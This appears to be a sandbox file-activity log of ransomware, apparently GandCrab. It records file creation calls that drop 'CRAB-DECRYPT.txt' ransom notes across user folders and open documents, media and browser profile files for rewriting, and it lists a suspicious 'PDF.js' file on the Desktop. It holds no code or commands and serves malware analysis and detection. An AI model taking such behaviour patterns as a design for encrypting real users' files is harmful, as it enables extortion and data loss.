Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ctwtFUQdhyq9B0.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\wwWTiMqjx6hY7AqmcQRC.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ZluEZ8VfU.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\AeKHMJrNCDYUq.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\usc0a0c3QarsfV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\Ft1MOn1CIc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\1taL0c72JXkGj.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\EmullYJgNTq8y.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\fJJNxlZPFcIOL7N8L.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\hjOwYAb7YQ2odlEyn.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Nd9E1FYi\Contacts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ZcRis.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\pEtobMGPdVk4C2adw.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sEi0K8sZnqEl5.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\oXr639hN3x86Bhd.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\XmnJxoBkEp9WD4cyN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\KtzEQVEZQWFLdAY3Qn.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sbZAE.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ukO9D2qllnBsxnQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\UsVrBfwU9tuC5KFqX2K.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\gr07JV38A.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\BhX74jJaOIdhyhcSe5G9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\xQ6SLR9y03J4ITfu7P.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\4z3uag.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\BokNObz8UcZzwf.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\rYZw8NqY13.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\Kn7qhmeLrMy5AdqLU92.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sDKhau.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\8qGeXH1kIXTzNAwh1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\991tuWIWnfwOaO.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\LOFKJdnEn4MzMXm.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\A2LolHZayGTsHiI6.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\3xZTjcYNMEA.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\RH3IiU0yMrDFNR6DKs.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\4DdBg.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\q8_fCWTtYsp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2QWqJ.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\40xf9IqVMYI.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
